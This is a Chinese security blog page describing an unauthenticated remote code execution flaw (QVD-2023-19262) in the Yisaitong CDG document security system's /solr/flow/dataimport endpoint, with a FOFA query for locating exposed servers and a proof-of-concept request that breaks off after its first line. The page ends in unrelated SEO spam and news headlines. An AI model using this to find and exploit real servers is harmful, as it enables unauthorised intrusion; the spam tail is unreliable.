亿赛通电子文档安全管理系统 RCE漏洞复现(QVD-2023-19262)

0x01 产品简介

   亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。

0x02 漏洞概述

   亿赛通电子文档安全管理系统/solr/flow/dataimport接口处存在远程代码执行漏洞,未经授权的攻击者可通过此漏洞执行任意指令,从而获取服务器权限。

0x03 复现环境

 FOFA:app="亿赛通-电子文档安全管理系统"

0x04 漏洞复现 

http://your-ip/solr/flow/dataimport

出现以上这种情况可能存在漏洞

PoC

POST /solr/flow/dataimport?command=full-import&am
0xSecl
关注 关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
订阅专栏
某赛通电子文档安全管理系统 RCE(QVD-2023-19262)
weixin_43567873的博客
03-20 23
某赛通电子文档安全管理系统 RCE(QVD-2023-19262)
亿赛文档安全管理系统 (2).pdf
03-12
..
亿赛通电子文档安全管理系统V5.0--系统安装手册.docx
01-16
亿赛通电子文档安全管理系统V5.0--系统安装手册.docx
亿赛通电子文档安全管理系统 SQL注入漏洞复现
ZL_1618的博客
03-14 485
由于亿赛通电子文档安全管理系统/update.jsp处的ids参数处对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
亿赛文档安全管理系统分享.pdf
02-03
亿赛文档安全管理系统分享.pdf
亿赛文档安全管理系统.docx
03-12
..
亿赛文档安全管理系统实用.pdf
03-04
亿赛文档安全管理系统实用.pdf
亿赛通电子文档安全管理系统dataimport远程命令执行漏洞
chaojixiaojingang
08-06 7416
1.漏洞描述 亿赛通电子文档安全管理系统dataimport存在远程命令执行漏洞,攻击者过构造特定的请求可执行任意命令。 2.网络资产查找 FOFA:title="电子文档安全管理系统" 3.POC import requests import sys import random import re import base64 import time from requests.packages.urllib3.exceptions import InsecureRequest...
亿赛通电子文档安全管理系统 XStream反序列化 RCE
qq_36334672的博客
01-26 394
【代码】亿赛通电子文档安全管理系统 XStream反序列化 RCE
亿赛通电子文档安全管理系统 RCE漏洞
holyxp的博客
08-21 1940
亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全
网络安全ctf比赛/学习资源整理,解题工具、比赛时间、解题思路、实战靶场、学习路线,推荐收藏!...
网络安全
03-27 8939
对于想学习或者参加CTF比赛的朋友来说,CTF工具、练习靶场必不可少,今天给大家分享自己收藏的CTF资源,希望能对各位有所帮助。CTF在线工具首先给大家推荐我自己常用的3个CTF在线工具网站,内容齐全,收藏备用。1、CTF在线工具箱:http://ctf.ssleye.com/ 包含CTF比赛中常用的编码、加解密、算法。2、CTF加解密工具箱:http://www.atoolbox.ne...
2023HW护网100+个漏洞poc
Yb528970805的博客
09-19 3007
20 . Metabase validate 远程命令执行漏洞CVE-2023-38646。13 . HiKVISION 综合安防管理平台 files 任意文件上传漏洞 POC。3 . Adobe ColdFusion 反序列化漏洞CVE-2023-29300。25 . Panabit iXCache网关RCE漏洞CVE-2023-38646。65 . 泛微E-Office9文件上传漏洞 CVE-2023-2523 POC。66 . 泛微E-Office9文件上传漏洞 CVE-2023-2648 POC。
亿赛通电子文档管理系统功能介绍
xunan518的博客
10-19 552
对计算机端口与存储设备进行安全控制,包括对U盘、移动硬盘、各类存储卡、同步软件、软驱、串口、并口、调制解调器、打印机、1394、红外、蓝牙、无线等的安全控制,有效规避设备端口泄密隐患。被归档的文档权限将被收回,对该文件有操作权限的用户将不能对文件做任何操作,如不能授权、权限申请、阅读、还原等。支持对系统平台相关审批流程,包括文档解密流程表单、文档还原流程表单、文档外发流程表单、邮件外发流程表单、离线办公流程表单、权限申请流程表单、特权权限流程、流转流程表单、邮件解密表单。
内网安全之证书模版的管理
weixin_45910629的博客
05-29 978
证书模板 Certificate templates 是 CA 证书颁发机构的一个组成部分,是证书策略中的重要元素,是用于证书注册、使用和管理的一组规则和格式。当 CA 收到对证书的请求时,必须对该请求应用一组规则和设置,以执行所请求的功能,例如证书颁发或更新。这些规则可以是简单的,也可以是复杂的,也可以适用于所有用户或特定的用户组。证书模板是在 CA 上配置并应用于传入证书请求的一组规则和设置。证书模板还向客户机提供了关于如何创建和提交有效的证书请求的说明。基于证书模板的证书只能由企业 CA 颁发。
云端数据提取:安全、高效地利用无限资源
Shaidou_Data的博客
05-30 527
随着技术的不断进步和安全威胁的不断演变,企业和组织必须持续关注和更新他们的数据处理策略,以应对未来可能出现的新挑战。然而,随着数据的指数级增长,数据的安全性和高效的数据处理成为了企业最为关心的议题之一。在云计算环境中,数据安全面临着多方面的挑战,包括但不限于未经授权的数据访问、数据泄露、以及数据在传输过程中的截取等。数据提取是数据处理流程中的第一步,它涉及从各种源系统中检索所需数据的过程。
富格林:谨防被骗实现安全交易
fgl100的博客
05-30 246
富格林指出,进行现货黄金投资的时候,有不少投资者都会犯下这个危及安全交易的毛病,就是没有合理控制好交易成本。如果投资成本没有控制好,把自己账户资金的全部都放进去,那么一旦逆势波动,就可能会发生爆仓的情况。成本和仓位不混为一谈,有些投资者认为成本和仓位是一样的,但并不是的,成本是投资者,投入多少金额的。如果投资的仓位较大,成本也会大,但是成本大,仓位不一定大,同时大仓位带来的收益与风险是并存的。以上的是富格林分享的控制费用成本的实用方法,有助于帮助投资者过减少支出,从而增加利润。
2024年终端安全管理系统最新排名(2024终端安全管理软件TOP5)
最新发布
2401_83058349的博客
05-30 262
在2024年,随着企业数字化转型的加速和网络安全威胁的日益严峻,终端安全管理系统的重要性愈发凸显。因此,各大终端安全管理系统厂商纷纷推出新的产品和解决方案,以满足市场的需求。这些厂商过不断的技术研发和创新,推出了各具特色的终端安全管理系统,为企业提供了全方位的安全保障。各大厂商将继续加大技术研发和创新力度,推出更加先进、高效、安全的终端安全管理系统,为企业提供更加坚实的安全保障。未来,终端安全管理系统将更加注重智能化、自动化和云化的发展趋势,以满足企业日益增长的安全需求。
家用一氧化碳安全新防线:电池款检测仪检查与必要性分析
BDjiance的博客
05-30 382
电池款一氧化碳气体检测仪的检查项目主要包括以下几个方面:1. 外观检查:检查检测仪外观是否完好,有无损坏或变形,确保各部件连接紧密,无松动现象。2. 功能检查:检查检测仪的开机、关机、报警等功能是否正常,确保其在检测到一氧化碳超标时能够及时发出警报。3. 精度校准:对检测仪进行精度校准,确保其测量结果与标准值相符,避免误差产生。4. 电池检查:检查电池电量是否充足,确保在停电或外出使用时能够正常工作。
亿赛通电子文档如何保存不加密的文件
06-08
亿赛通电子文档可以过以下步骤保存不加密的文件: 1. 打开亿赛通电子文档软件。 2. 在软件界面中选择要保存的文件。 3. 点击“另存为”按钮。 4. 在弹出的对话框中选择保存路径和文件名。 5. 在“保存类型”选项中选择“普文档”。 6. 点击“保存”按钮即可保存不加密的文件。 请注意,如果您需要保护文档安全性,建议您选择加密保存,以防止未经授权的访问和修改。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • 瑞友天翼应用虚拟化系统RCE漏洞复现+利用 20443
  • 禅道项目管理系统RCE漏洞复现+利用 16499
  • 海康威视iVMS综合安防系统任意文件上传漏洞复现(0day) 11975
  • 泛微 E-Office文件上传漏洞复现(CVE-2023-2523、CVE-2023-2648) 10794
  • 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012) 10682

分类专栏

  • 漏洞复现 付费 635篇

最新评论

  • DT-高清车牌识别摄像机 任意文件读取漏洞复现

    2401_84263282: 阅读这篇博文真是一次愉快的体验!作者的文字真是动人心弦,语言精准而生动。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】

  • 翰智员工服务平台 loginByPassword SQL注入漏洞复现

    2401_84254418: 文章构思巧妙,结构紧凑,既有深度又有广度,读后让人受益匪浅,确实是一篇值得一读的佳作。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】

  • JeecgBoot JimuReport testConnection RCE漏洞复现

    CVE-柠檬i: 大哥,天天上网冲浪都能碰到你表情包

  • DSShop移动商城网店系统 反序列化RCE漏洞复现

    CVE-柠檬i: 我离getshell就差你这9.9¥

  • 方正畅享全媒体新闻采编系统 binary.do SQL注入漏洞复现

    0xSecl: 可能有的环境修复了

大家在看

  • 【软件工程】结构化分析与设计——数据流图、SC图、流程图、N-S图
  • 工程学中的哲学 2
  • WebRTC 各端的互联互通 352
  • 数字加大小写字母组成随机验证码
  • 子工程想引入 Maven 属性或环境变量占位符

最新文章

  • 万户ezEIP企业管理系统 /member/success.aspx 命令执行漏洞复现
  • CraftCMS ConditionsController.php 代码执行漏洞(CVE-2023-41892)
  • SpringBlade tenant/list SQL 注入漏洞复现
2024
05月 80篇
04月 106篇
03月 43篇
02月 55篇
01月 98篇
2023年245篇
2022年8篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或 充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

深圳SEO优化公司乌海网站建设凉山模板网站建设价格坑梓百度网站优化价格光明外贸网站设计推荐昆明百度竞价多少钱白山关键词排名推荐南京百度竞价塘坑如何制作网站报价淮安seo排名推荐景德镇seo价格贵阳优化多少钱韶关建设网站伊春SEO按天计费南宁网站设计推荐宿迁网站优化按天计费哪家好遂宁建站报价滁州关键词排名包年推广推荐石家庄网站优化塘坑网站改版哪家好临夏模板推广公司红河网站开发哪家好乌海SEO按天收费价格温州模板制作价格秦皇岛关键词排名包年推广公司玉林百度关键词包年推广公司果洛关键词按天计费价格北海网站建设设计多少钱阿里网站优化吉安营销网站公司萍乡百度网站优化报价歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

深圳SEO优化公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化